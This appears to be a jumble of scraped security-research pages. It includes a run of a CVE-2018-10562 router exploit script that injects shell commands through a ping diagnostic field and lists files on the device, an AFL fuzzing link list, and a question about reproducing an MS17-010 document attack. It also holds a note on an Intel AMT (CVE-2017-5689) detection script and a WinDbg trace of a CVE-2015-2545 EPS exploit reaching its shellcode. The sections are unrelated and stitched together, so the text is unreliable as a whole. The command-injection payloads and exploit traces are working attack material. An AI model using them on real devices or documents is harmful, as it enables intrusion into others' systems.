  483 root       1856 S < /bin/TimerMgr -p 10 -s 0
  484 root       1856 S < /bin/TimerMgr -p 10 -s 0
  485 root       2836 S   /bin/LogMgr -p 20 -s 0
  486 root       2300 S   /bin/MiscMgr -p 20 -s 0
  496 root       3624 S   /bin/PonMgr -p 20 -s 0
  497 root       2308 S   /bin/NetMgr -p 20 -s 0
  550 root       3604 S < /bin/VmrMgr -p 10 -s 0
  551 root       3604 S < /bin/VmrMgr -p 10 -s 0
  552 root       3604 S < /bin/VmrMgr -p 10 -s 0
  553 root       3968 S   /bin/EthMgr -p 20 -s 0
  554 root       6360 S   /bin/tr069Mgr -p 20 -s 0
  573 root       6360 S   /bin/tr069Mgr -p 20 -s 0
  574 root       6360 S < /bin/tr069Mgr -p 20 -s 0
  575 root       6360 S < /bin/tr069Mgr -p 20 -s 0
  576 root       6360 S < /bin/tr069Mgr -p 20 -s 0
  577 root       2332 S   /bin/WebMgr -p 20 -s 0
  580 root       6336 S   /bin/MecMgr -p 20 -s 0
  607 root       3624 D   /bin/PonMgr -p 20 -s 0
  608 root       3624 S   /bin/PonMgr -p 20 -s 0
  609 root       3624 D < /bin/PonMgr -p 20 -s 0
  684 root       2308 S   /bin/NetMgr -p 20 -s 0
  685 root       2308 S   /bin/NetMgr -p 20 -s 0
  692 root       3604 S < /bin/VmrMgr -p 10 -s 0
  695 root            SW< [voip isr/0]
  698 root       3604 S < /bin/VmrMgr -p 10 -s 0
  701 root            SW< [TAPIevents/0]
  709 root            SW  [TAPIdxt_int]
  711 root       3604 S < /bin/VmrMgr -p 10 -s 0
  720 root       6336 S   /bin/MecMgr -p 20 -s 0
  722 root            SW< [brdg_wkq/0]
  996 root       1140 S   /bin/sh /sbin/pppoe-connect 0
 1005 root       1412 S   /sbin/pppd pty /sbin/pppoe -p /var/run/pppoe0.pid.ppp
 1006 root       1132 S   sh -c /sbin/pppoe -p /var/run/pppoe0.pid.pppoe -I wan
 1007 nobody      600 S   /sbin/pppoe -p /var/run/pppoe0.pid.pppoe -I wan0 -T 8
 1032 nobody      812 S   dnsmasq -6 /bin/mReport -C /tmp/dnsmasq.cfg -K
 1033 root        800 S   dnsmasq -6 /bin/mReport -C /tmp/dnsmasq.cfg -K
 1216 root       1320 S   upnpd ppp0 br0
 1217 root       1320 S   upnpd ppp0 br0
 1218 root       1320 S   upnpd ppp0 br0
 1220 root       1320 S   upnpd ppp0 br0
 1221 root       1320 S   upnpd ppp0 br0
 1222 root       1320 S   upnpd ppp0 br0
 1224 root       1320 S   upnpd ppp0 br0
 1226 root       1320 S   upnpd ppp0 br0
 1228 root       1320 S   upnpd ppp0 br0
 1229 root       1320 S   upnpd ppp0 br0
 1315 root       1240 S   hostapd -B /tmp/hostapd.conf
 6834 root       2332 S   /bin/WebMgr -p 20 -s 0
 8360 root       2332 S   /bin/WebMgr -p 20 -s 0
 8363 root       1132 S   sh -c echo "ping -c 4 -s 64 127.0.0.1;`echo TFGQ;ps;e
 8364 root       1132 S   sh -c echo "ping -c 4 -s 64 127.0.0.1;`echo TFGQ;ps;e
 8365 root       1136 R   ps
TFGQ;

";


$ py3 exploit-CVE-2018-10562.py http://192.168.1.100:8080/ "ls /web/"
INFO:__main__:sending payload: 127.0.0.1;`echo Rbfg;ls /web/;echo Rbfg`;
diag_result = "ping -c 4 -s 64 127.0.0.1;Rbfg
html
Rbfg;

";

$ py3 exploit-CVE-2018-10562.py http://192.168.1.100:8080/ "ls /web/html/"
INFO:__main__:sending payload: 127.0.0.1;`echo dZad;ls /web/html/;echo dZad`;
diag_result = "ping -c 4 -s 64 127.0.0.1;dZad
backup.html
ddns.html
devinfo.html
diag.html
dmz_alg.html
dns_host.html
download
error.html
firewall.html
images
index.html
init.html
ip_filter.html
lan.html
landev.html
language.html
laninfo.html
log.html
login.html
login_spa.html
logo.html
logout.html
mac_filter.html
menu.html
nat.html
nat_portforwarding.html
ntp.html
password.html
poninfo.html
reboot.html
rebooting.html
route.html
script
slid.html
style
tab.html
template
tr069.html
upgrade.html
upnp.html
usb.html
wan.html
waninfo.html
wifi.html
dZad;

";

[Question] Fuzzing

AFL

- https://en.wikipedia.org/wiki/Fuzzing
- https://en.wikipedia.org/wiki/Fuzz_testing
- http://lcamtuf.coredump.cx/afl/
- http://lcamtuf.coredump.cx/afl/demo/
- http://lcamtuf.coredump.cx/afl/QuickStartGuide.txt
- http://lcamtuf.coredump.cx/afl/#bugs
- http://lcamtuf.coredump.cx/afl/README.txt
- http://lcamtuf.coredump.cx/afl/releases/afl-latest.tgz
- http://lcamtuf.coredump.cx/afl/technical_details.txt

- http://lcamtuf.blogspot.com/2014/08/binary-fuzzing-strategies-what-works.html
- http://lcamtuf.blogspot.com/2014/10/fuzzing-binaries-without-execve.html
- http://lcamtuf.blogspot.com/2014/11/pulling-jpegs-out-of-thin-air.html
- http://lcamtuf.blogspot.com/2014/11/afl-fuzz-crash-exploration-mode.html
- http://lcamtuf.blogspot.com/2015/01/afl-fuzz-making-up-grammar-with.html
- http://lcamtuf.blogspot.com/2015/04/finding-bugs-in-sqlite-easy-way.html
- http://lcamtuf.blogspot.com/2016/02/say-hello-to-afl-analyze.html

- https://groups.google.com/d/msg/afl-users/eWb2PgjLnUo/8AKqadYzSBoJ
- https://groups.google.com/forum/#!topic/afl-users/RW4RF6x9aBc

- https://github.com/secfigo/Awesome-Fuzzing
- http://llvm.org/docs/LibFuzzer.html
- http://honggfuzz.com/
- https://github.com/aoh/radamsa

- https://www.youtube.com/watch?v=29RbO5bftwo
- https://www.evilsocket.net/2015/04/30/fuzzing-with-afl-fuzz-a-practical-example-afl-vs-binutils/
- https://labsblog.f-secure.com/2017/06/22/super-awesome-fuzzing-part-one/
- http://thecyberrecce.net/2017/03/20/software-exploit-development-fuzzing-with-afl/
- https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2016/june/project-triforce-run-afl-on-everything/
- https://www.fastly.com/blog/how-fuzz-server-american-fuzzy-lop
- https://www.reddit.com/r/fuzzing/
- https://animal0day.blogspot.jp/2017/05/fuzzing-apache-httpd-server-with.html
- https://animal0day.blogspot.jp/2017/07/
- https://sensepost.com/blog/2017/fuzzing-apache-httpd-server-with-american-fuzzy-lop-%2B-persistent-mode/
- https://foxglovesecurity.com/2016/03/15/fuzzing-workflows-a-fuzz-job-from-start-to-finish/
- http://research.aurainfosec.io/hunting-for-bugs-101/
- http://paper.seebug.org/323/
$ CC="afl-clang-fast" CFLAGS="-fsanitize=address -ggdb" CXXFLAGS="-fsanitize=address -ggdb" ./configure
$ make

fuzzing

[Links] MS17-010

How can I recurrent this vulnerable?

I notice there is a http link hyoeyeep.ws,and I modified hosts file to let this domain point to local server.On the server,I put the template.doc and change its content-type to application/hta.I opened the bin file as doc or rtf,but nothing happened.Which step that I missed?

Potential false negative with the CVE-2017-5689.py script

You may get false negative with current script:

  1. AMT web interface could be disable while only WS-MAN is enabled
  2. In Kabilake and Skylake system with AMT 11.x version, the Server field in the HTTP response won't match what you have in your script.

See example below to send WS-MAN to get AMT FW Core Version and also how the HTTP response with Server field will look like

POST /wsman HTTP/1.1
Content-Length: 1543
Connection: close
User-Agent: Mozilla/5.0 
Host: 134.134.134.134

<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:tns="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/CIM_SoftwareIdentity" xmlns:wsdl="http://schemas.xmlsoap.org/wsdl/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:wsman="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:wscat="http://schemas.xmlsoap.org/ws/2005/06/wsmancat" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wxf="http://schemas.xmlsoap.org/ws/2004/09/transfer" xmlns:wse="http://schemas.xmlsoap.org/ws/2004/08/eventing" xmlns:cim="http://schemas.dmtf.org/wbem/wscim/1/common" xmlns:wsen="http://schemas.xmlsoap.org/ws/2004/09/enumeration">
  <soap:Header>
    <wsa:To>http://134.134.134.134:16992/wsman</wsa:To>
    <wsa:ReplyTo>
      <wsa:Address soap:mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</wsa:Address>
    </wsa:ReplyTo>
    <wsa:Action soap:mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/09/transfer/Get</wsa:Action>
    <wsman:MaxEnvelopeSize soap:mustUnderstand="true">51200</wsman:MaxEnvelopeSize>
    <wsa:MessageID>uuid:72426165-3612-0436-6450-103681140543</wsa:MessageID>
    <wsman:ResourceURI soap:mustUnderstand="true">http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/CIM_SoftwareIdentity</wsman:ResourceURI>
    <wsman:SelectorSet>
      <wsman:Selector Name="InstanceID">AMT FW Core Version</wsman:Selector>
    </wsman:SelectorSet>
    <wsman:OperationTimeout>PT60.000S</wsman:OperationTimeout>
  </soap:Header>
  <soap:Body />
</soap:Envelope>

HTTP/1.1 401 Unauthorized
WWW-Authenticate: Digest realm="Digest:30D40000000000000000000000000000", nonce="zm8DAAsfAAAKg62FIMR9haAOe9Ix13A6",stale="false",qop="auth"
Content-Type: text/html
Server: AMT
Content-Length: 690
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" >
<html><head><link rel=stylesheet href=/styles.css>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Intel&reg; Active Management Technology</title></head>
<body>
<table class=header>
<tr><td valign=top nowrap>
<p class=top1>Intel<font class=r><sup>&reg;</sup></font> Active Management Technology
<td valign="top"><img src="logo.gif" align="right" alt="Intel">
</table>
<br />
<h2 class=warn>Log on failed. Incorrect user name or password, or user account temporarily locked.</h2>

<p>
<form METHOD="GET" action="index.htm"><h2><input type=submit value="Try again">
</h2></form>
<p>

</body>
</html>

[Analysis] CVE-2015-2545

exploit-000

plugin-002

plugin-003

igfx-002

*** wait with pending attach

************* Symbol Path validation summary **************
Response                         Time (ms)     Location
Deferred                                       SRV*C:\Symbols*http://msdl.microsoft.com/download/symbols
Symbol search path is: SRV*C:\Symbols*http://msdl.microsoft.com/download/symbols
Executable search path is: 
ModLoad: 2fe80000 2fee6000   C:\Program Files\Microsoft Office\Office12\WINWORD.EXE
ModLoad: 77570000 776ac000   C:\Windows\SYSTEM32\ntdll.dll
ModLoad: 77350000 77424000   C:\Windows\system32\kernel32.dll
ModLoad: 75880000 758ca000   C:\Windows\system32\KERNELBASE.dll
ModLoad: 76390000 76430000   C:\Windows\system32\ADVAPI32.dll
ModLoad: 760d0000 7617c000   C:\Windows\system32\msvcrt.dll
ModLoad: 76450000 76469000   C:\Windows\SYSTEM32\sechost.dll
ModLoad: 76180000 76221000   C:\Windows\system32\RPCRT4.dll
ModLoad: 6c660000 6c6fb000   C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\MSVCR80.dll
ModLoad: 755b0000 755fc000   C:\Windows\system32\apphelp.dll
ModLoad: 6d390000 6d40b000   C:\Windows\AppPatch\AcSpecfc.DLL
ModLoad: 75590000 755ab000   C:\Windows\system32\SspiCli.dll
ModLoad: 6f1e0000 6f264000   C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\COMCTL32.dll
ModLoad: 76240000 7628e000   C:\Windows\system32\GDI32.dll
ModLoad: 76290000 76359000   C:\Windows\system32\USER32.dll
ModLoad: 75b60000 75b6a000   C:\Windows\system32\LPK.dll
ModLoad: 75f60000 75ffd000   C:\Windows\system32\USP10.dll
ModLoad: 70260000 702d9000   C:\Windows\system32\mscms.dll
ModLoad: 74d40000 74d57000   C:\Windows\system32\USERENV.dll
ModLoad: 75680000 7568b000   C:\Windows\system32\profapi.dll
ModLoad: 776c0000 77717000   C:\Windows\system32\SHLWAPI.dll
ModLoad: 75cf0000 75e4c000   C:\Windows\system32\ole32.dll
ModLoad: 76700000 7734a000   C:\Windows\system32\SHELL32.dll
ModLoad: 739c0000 739f2000   C:\Windows\system32\WINMM.dll
ModLoad: 6c820000 6c907000   C:\Windows\system32\DDRAW.dll
ModLoad: 744d0000 744d6000   C:\Windows\system32\DCIMAN32.dll
ModLoad: 759c0000 75b5d000   C:\Windows\system32\SETUPAPI.dll
ModLoad: 75900000 75927000   C:\Windows\system32\CFGMGR32.dll
ModLoad: 76000000 7608f000   C:\Windows\system32\OLEAUT32.dll
ModLoad: 75860000 75872000   C:\Windows\system32\DEVOBJ.dll
ModLoad: 73f50000 73f63000   C:\Windows\system32\dwmapi.dll
ModLoad: 710d0000 710e2000   C:\Windows\system32\MPR.dll
ModLoad: 77720000 7779b000   C:\Windows\system32\COMDLG32.dll
ModLoad: 76430000 7644f000   C:\Windows\system32\IMM32.dll
ModLoad: 75b70000 75c3c000   C:\Windows\system32\MSCTF.dll
ModLoad: 76090000 760c5000   C:\Windows\system32\WS2_32.dll
ModLoad: 76230000 76236000   C:\Windows\system32\NSI.dll
ModLoad: 6ded0000 6e110000   C:\Windows\system32\msi.dll
ModLoad: 64020000 65168000   C:\Program Files\Microsoft Office\Office12\wwlib.dll
ModLoad: 66e80000 67de8000   C:\Program Files\Microsoft Office\Office12\oart.dll
ModLoad: 685a0000 69627000   C:\Program Files\Common Files\Microsoft Shared\office12\mso.dll
ModLoad: 6c920000 6c9f7000   C:\Program Files\Microsoft Office\Office12\1033\wwintl.dll
ModLoad: 74330000 74370000   C:\Windows\system32\uxtheme.dll
ModLoad: 744e0000 7467e000   C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\Comctl32.dll
ModLoad: 62f90000 635e5000   C:\Program Files\Common Files\Microsoft Shared\OFFICE12\MSORES.DLL
ModLoad: 6c560000 6c61a000   C:\Program Files\Common Files\Microsoft Shared\OFFICE12\MSPTLS.DLL
ModLoad: 6fc30000 6fc47000   C:\Windows\system32\DavClnt.DLL
ModLoad: 6fae0000 6fae8000   C:\Windows\system32\DAVHLPR.dll
ModLoad: 5e420000 5edfd000   C:\Program Files\Common Files\Microsoft Shared\office12\1033\MSOINTL.DLL
ModLoad: 6d2e0000 6d32a000   C:\Windows\system32\mscoree.dll
ModLoad: 6ca00000 6ca7d000   C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
ModLoad: 74a50000 74a59000   C:\Windows\system32\VERSION.dll
ModLoad: 75600000 7560c000   C:\Windows\system32\CRYPTBASE.dll
ModLoad: 6fff0000 70041000   C:\Windows\system32\Winspool.DRV
ModLoad: 6cb20000 6cbda000   C:\Windows\system32\spool\DRIVERS\W32X86\3\unidrvui.dll
ModLoad: 6c520000 6c558000   C:\Windows\system32\spool\DRIVERS\W32X86\3\mxdwdui.DLL
ModLoad: 76670000 766f3000   C:\Windows\system32\CLBCatQ.DLL
ModLoad: 683c0000 684c5000   C:\Program Files\Common Files\Microsoft Shared\office12\riched20.dll
ModLoad: 743a0000 74495000   C:\Windows\system32\propsys.dll
ModLoad: 73d00000 73d21000   C:\Windows\system32\ntmarta.dll
ModLoad: 75ca0000 75ce5000   C:\Windows\system32\WLDAP32.dll
ModLoad: 6a1a0000 6a2f5000   C:\Program Files\Common Files\Microsoft Shared\OFFICE11\msxml5.dll
ModLoad: 751d0000 751e7000   C:\Windows\system32\CRYPTSP.dll
ModLoad: 74eb0000 74eeb000   C:\Windows\system32\rsaenh.dll
ModLoad: 75670000 7567e000   C:\Windows\system32\RpcRtRemote.dll
ModLoad: 75610000 7566f000   C:\Windows\system32\SXS.DLL
ModLoad: 6c460000 6c517000   C:\Program Files\Microsoft Office\Office12\msproof6.dll
ModLoad: 68050000 680d7000   C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\MSVCP80.dll
ModLoad: 3f100000 3f401000   C:\Program Files\Common Files\Microsoft Shared\PROOF\1033\MSGR3EN.DLL
ModLoad: 66db0000 66e71000   C:\Windows\system32\spool\DRIVERS\W32X86\3\mxdwdrv.dll
ModLoad: 6e7b0000 6e7c4000   C:\Windows\system32\FontSub.dll
(cd0.a04): Break instruction exception - code 80000003 (first chance)
eax=7ffd4000 ebx=00000000 ecx=00000000 edx=7760f125 esi=00000000 edi=00000000
eip=775a40f0 esp=04b4f78c ebp=04b4f7b8 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
ntdll!DbgBreakPoint:
775a40f0 cc              int     3
0:010> ba r4 ZwProtectVirtualMemory
0:010> g
(cd0.e50): Unknown exception - code e0000002 (first chance)
(cd0.e50): Unknown exception - code e0000002 (first chance)
ModLoad: 62e00000 62f8b000   C:\Program Files\Common Files\Microsoft Shared\OFFICE12\OGL.DLL
ModLoad: 73e00000 73e0d000   C:\Windows\system32\WTSAPI32.DLL
ModLoad: 75690000 756b9000   C:\Windows\system32\WINSTA.dll
ModLoad: 6fad0000 6fad9000   C:\Windows\system32\LINKINFO.dll
ModLoad: 6e8a0000 6e910000   C:\Windows\system32\ntshrui.dll
ModLoad: 75330000 75349000   C:\Windows\system32\srvcli.dll
ModLoad: 6e940000 6e94b000   C:\Windows\system32\cscapi.dll
ModLoad: 73900000 7390a000   C:\Windows\system32\slc.dll
ModLoad: 63bb0000 63c1f000   C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\EPSIMP32.FLT
(cd0.e50): C++ EH exception - code e06d7363 (first chance)
(cd0.e50): C++ EH exception - code e06d7363 (first chance)
(cd0.e50): C++ EH exception - code e06d7363 (first chance)
(cd0.e50): C++ EH exception - code e06d7363 (first chance)
(cd0.e50): C++ EH exception - code e06d7363 (first chance)
(cd0.e50): C++ EH exception - code e06d7363 (first chance)
(cd0.e50): C++ EH exception - code e06d7363 (first chance)
(cd0.e50): C++ EH exception - code e06d7363 (first chance)
(cd0.e50): C++ EH exception - code e06d7363 (first chance)
(cd0.e50): C++ EH exception - code e06d7363 (first chance)
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\EPSIMP32.FLT - 
Breakpoint 0 hit
eax=000000b8 ebx=04371f01 ecx=775b5f18 edx=00000000 esi=00000000 edi=0011ea78
eip=63bed2a0 esp=002bc7a0 ebp=002bc7dc iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
EPSIMP32!RegisterPercentCallback+0x15c3e:
63bed2a0 8975d4          mov     dword ptr [ebp-2Ch],esi ss:0023:002bc7b0=00000000
0:000> ub eip
EPSIMP32!RegisterPercentCallback+0x15c23:
63bed285 3b482c          cmp     ecx,dword ptr [eax+2Ch]
63bed288 7d21            jge     EPSIMP32!RegisterPercentCallback+0x15c49 (63bed2ab)
63bed28a 8b5024          mov     edx,dword ptr [eax+24h]
63bed28d 8b12            mov     edx,dword ptr [edx]
63bed28f 8b5220          mov     edx,dword ptr [edx+20h]
63bed292 035028          add     edx,dword ptr [eax+28h]
63bed295 c745d003000000  mov     dword ptr [ebp-30h],3
63bed29c 0fb6040a        movzx   eax,byte ptr [edx+ecx]
0:000> bc 0
0:000> bp 63bed29c "u edx+ecx;r;g;"
0:000> bp ntdll!NtCreateEvent+0x5 ".if(eax == 0x45){g;}"
0:000> g
ntdll!ZwProtectVirtualMemory+0x3:
775b5f1b 0000            add     byte ptr [eax],al
775b5f1d ba0003fe7f      mov     edx,offset SharedUserData!SystemCallStub (7ffe0300)
775b5f22 ff12            call    dword ptr [edx]
775b5f24 c21400          ret     14h
775b5f27 90              nop
ntdll!NtPulseEvent:
775b5f28 b8d8000000      mov     eax,0D8h
775b5f2d ba0003fe7f      mov     edx,offset SharedUserData!SystemCallStub (7ffe0300)
775b5f32 ff12            call    dword ptr [edx]
eax=043720b0 ebx=04371f01 ecx=775b5f1b edx=00000000 esi=00000000 edi=0011ea78
eip=63bed29c esp=002bc718 ebp=002bc754 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
EPSIMP32!RegisterPercentCallback+0x15c3a:
63bed29c 0fb6040a        movzx   eax,byte ptr [edx+ecx]     ds:0023:775b5f1b=00
ntdll!ZwProtectVirtualMemory+0x4:
775b5f1c 00ba0003fe7f    add     byte ptr SharedUserData!SystemCallStub (7ffe0300)[edx],bh
775b5f22 ff12            call    dword ptr [edx]
775b5f24 c21400          ret     14h
775b5f27 90              nop
ntdll!NtPulseEvent:
775b5f28 b8d8000000      mov     eax,0D8h
775b5f2d ba0003fe7f      mov     edx,offset SharedUserData!SystemCallStub (7ffe0300)
775b5f32 ff12            call    dword ptr [edx]
775b5f34 c20800          ret     8
eax=043720b0 ebx=04371f01 ecx=775b5f1c edx=00000000 esi=00000000 edi=0011ea78
eip=63bed29c esp=002bc6a4 ebp=002bc6e0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
EPSIMP32!RegisterPercentCallback+0x15c3a:
63bed29c 0fb6040a        movzx   eax,byte ptr [edx+ecx]     ds:0023:775b5f1c=00
ntdll!ZwProtectVirtualMemory+0x1:
775b5f19 d7              xlat    byte ptr [ebx]
775b5f1a 0000            add     byte ptr [eax],al
775b5f1c 00ba0003fe7f    add     byte ptr SharedUserData!SystemCallStub (7ffe0300)[edx],bh
775b5f22 ff12            call    dword ptr [edx]
775b5f24 c21400          ret     14h
775b5f27 90              nop
ntdll!NtPulseEvent:
775b5f28 b8d8000000      mov     eax,0D8h
775b5f2d ba0003fe7f      mov     edx,offset SharedUserData!SystemCallStub (7ffe0300)
eax=043720b0 ebx=04371f01 ecx=775b5f19 edx=00000000 esi=00000000 edi=0011ea78
eip=63bed29c esp=002bc5f0 ebp=002bc62c iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
EPSIMP32!RegisterPercentCallback+0x15c3a:
63bed29c 0fb6040a        movzx   eax,byte ptr [edx+ecx]     ds:0023:775b5f19=d7
ntdll!ZwProtectVirtualMemory+0x2:
775b5f1a 0000            add     byte ptr [eax],al
775b5f1c 00ba0003fe7f    add     byte ptr SharedUserData!SystemCallStub (7ffe0300)[edx],bh
775b5f22 ff12            call    dword ptr [edx]
775b5f24 c21400          ret     14h
775b5f27 90              nop
ntdll!NtPulseEvent:
775b5f28 b8d8000000      mov     eax,0D8h
775b5f2d ba0003fe7f      mov     edx,offset SharedUserData!SystemCallStub (7ffe0300)
775b5f32 ff12            call    dword ptr [edx]
eax=043720b0 ebx=04371f01 ecx=775b5f1a edx=00000000 esi=00000000 edi=0011ea78
eip=63bed29c esp=002bc5f0 ebp=002bc62c iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
EPSIMP32!RegisterPercentCallback+0x15c3a:
63bed29c 0fb6040a        movzx   eax,byte ptr [edx+ecx]     ds:0023:775b5f1a=00
ntdll!ZwProtectVirtualMemory+0x3:
775b5f1b 0000            add     byte ptr [eax],al
775b5f1d ba0003fe7f      mov     edx,offset SharedUserData!SystemCallStub (7ffe0300)
775b5f22 ff12            call    dword ptr [edx]
775b5f24 c21400          ret     14h
775b5f27 90              nop
ntdll!NtPulseEvent:
775b5f28 b8d8000000      mov     eax,0D8h
775b5f2d ba0003fe7f      mov     edx,offset SharedUserData!SystemCallStub (7ffe0300)
775b5f32 ff12            call    dword ptr [edx]
eax=043720b0 ebx=04371f01 ecx=775b5f1b edx=00000000 esi=00000000 edi=0011ea78
eip=63bed29c esp=002bc5f0 ebp=002bc62c iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
EPSIMP32!RegisterPercentCallback+0x15c3a:
63bed29c 0fb6040a        movzx   eax,byte ptr [edx+ecx]     ds:0023:775b5f1b=00
ntdll!ZwProtectVirtualMemory+0x4:
775b5f1c 00ba0003fe7f    add     byte ptr SharedUserData!SystemCallStub (7ffe0300)[edx],bh
775b5f22 ff12            call    dword ptr [edx]
775b5f24 c21400          ret     14h
775b5f27 90              nop
ntdll!NtPulseEvent:
775b5f28 b8d8000000      mov     eax,0D8h
775b5f2d ba0003fe7f      mov     edx,offset SharedUserData!SystemCallStub (7ffe0300)
775b5f32 ff12            call    dword ptr [edx]
775b5f34 c20800          ret     8
eax=043720b0 ebx=04371f01 ecx=775b5f1c edx=00000000 esi=00000000 edi=0011ea78
eip=63bed29c esp=002bc5f0 ebp=002bc62c iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
EPSIMP32!RegisterPercentCallback+0x15c3a:
63bed29c 0fb6040a        movzx   eax,byte ptr [edx+ecx]     ds:0023:775b5f1c=00
(cd0.e50): C++ EH exception - code e06d7363 (first chance)
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=000000d7 ebx=04371fa0 ecx=061e0f08 edx=0011f5c8 esi=0011ea78 edi=00000000
eip=775b55ad esp=061e0f62 ebp=002bc870 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
ntdll!ZwCreateEvent+0x5:
775b55ad ba0003fe7f      mov     edx,offset SharedUserData!SystemCallStub (7ffe0300)
0:000> dd esp
061e0f62  061e2f08 ffffffff 061e0108 061e010c
061e0f72  00000040 061e0110 00000000 00000000
061e0f82  00000000 00000000 00000000 00000000
061e0f92  00000000 00000000 00000000 00000000
061e0fa2  00000000 00000000 00000000 00000000
061e0fb2  00000000 00000000 00000000 00000000
061e0fc2  00000000 00000000 00000000 00000000
061e0fd2  00000000 00000000 00000000 00000000
0:000> g poi(esp)
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=00000000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f08 esp=061e0f7a ebp=002bc870 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
061e2f08 60              pushad
0:000> uf eip
Flow analysis was incomplete, some code may be missing
061e2f08 60              pushad
061e2f09 64a100000000    mov     eax,dword ptr fs:[00000000h]
061e2f0f 8b4004          mov     eax,dword ptr [eax+4]
061e2f12 250000ffff      and     eax,0FFFF0000h

061e2f17 6681384d5a      cmp     word ptr [eax],5A4Dh
061e2f1c 7517            jne     061e2f35  Branch

061e2f1e 81783c00020000  cmp     dword ptr [eax+3Ch],200h
061e2f25 730e            jae     061e2f35  Branch

061e2f27 8b503c          mov     edx,dword ptr [eax+3Ch]
061e2f2a 03d0            add     edx,eax
061e2f2c 66813a5045      cmp     word ptr [edx],4550h
061e2f31 7502            jne     061e2f35  Branch

061e2f33 eb07            jmp     061e2f3c  Branch

061e2f35 2d00000100      sub     eax,10000h
061e2f3a ebdb            jmp     061e2f17  Branch

061e2f3c 8b7a1c          mov     edi,dword ptr [edx+1Ch]
061e2f3f 8b722c          mov     esi,dword ptr [edx+2Ch]
061e2f42 03f0            add     esi,eax
061e2f44 03fe            add     edi,esi

061e2f46 83ed04          sub     ebp,4
061e2f49 8b4d00          mov     ecx,dword ptr [ebp]
061e2f4c 3bce            cmp     ecx,esi
061e2f4e 7218            jb      061e2f68  Branch

061e2f50 3bcf            cmp     ecx,edi
061e2f52 7314            jae     061e2f68  Branch

061e2f54 8079fdff        cmp     byte ptr [ecx-3],0FFh
061e2f58 750e            jne     061e2f68  Branch

061e2f5a 8079fe50        cmp     byte ptr [ecx-2],50h
061e2f5e 7508            jne     061e2f68  Branch

061e2f60 8079ff10        cmp     byte ptr [ecx-1],10h
061e2f64 7502            jne     061e2f68  Branch

061e2f66 eb02            jmp     061e2f6a  Branch

061e2f68 ebdc            jmp     061e2f46  Branch

061e2f6a 896c2418        mov     dword ptr [esp+18h],ebp
061e2f6e 61              popad
061e2f6f 87e1            xchg    esp,ecx
061e2f71 60              pushad
061e2f72 8bec            mov     ebp,esp
061e2f74 e800000000      call    061e2f79
061e2f79 8b3424          mov     esi,dword ptr [esp]
061e2f7c 8d642404        lea     esp,[esp+4]
061e2f80 81ee71000000    sub     esi,71h
061e2f86 81c6a0000000    add     esi,0A0h
061e2f8c 68dc000000      push    0DCh
061e2f91 59              pop     ecx
061e2f92 8d3c8e          lea     edi,[esi+ecx*4]
061e2f95 6a1f            push    1Fh
061e2f97 58              pop     eax
061e2f98 d12f            shr     dword ptr [edi],1
061e2f9a d116            rcl     dword ptr [esi],1
061e2f9c 83c604          add     esi,4
061e2f9f 48              dec     eax
061e2fa0 7506            jne     061e2fa8  Branch

061e2fa2 6a1f            push    1Fh
061e2fa4 58              pop     eax
061e2fa5 83c704          add     edi,4

061e2fa8 7177            jno     061e3021  Branch

061e2faa b245            mov     dl,45h
061e2fac 2c98            sub     al,98h
061e2fae c52d86c52d0e    lds     ebp,fword ptr ds:[0E2DC586h]
061e2fb4 c529            lds     ebp,fword ptr [ecx]
061e2fb6 844521          test    byte ptr [ebp+21h],al
061e2fb9 90              nop
061e2fba c50d409c3600    lds     ecx,fword ptr ds:[369C40h]
061e2fc0 3980ba04403c    cmp     dword ptr [eax+3C4004BAh],eax
061e2fc6 023b            add     bh,byte ptr [ebx]
061e2fc8 803100          xor     byte ptr [ecx],0
061e2fcb 3a88409c2680    cmp     cl,byte ptr [eax-7FD963C0h]
061e2fd1 29803aef403c    sub     dword ptr [eax+3C40EF3Ah],eax
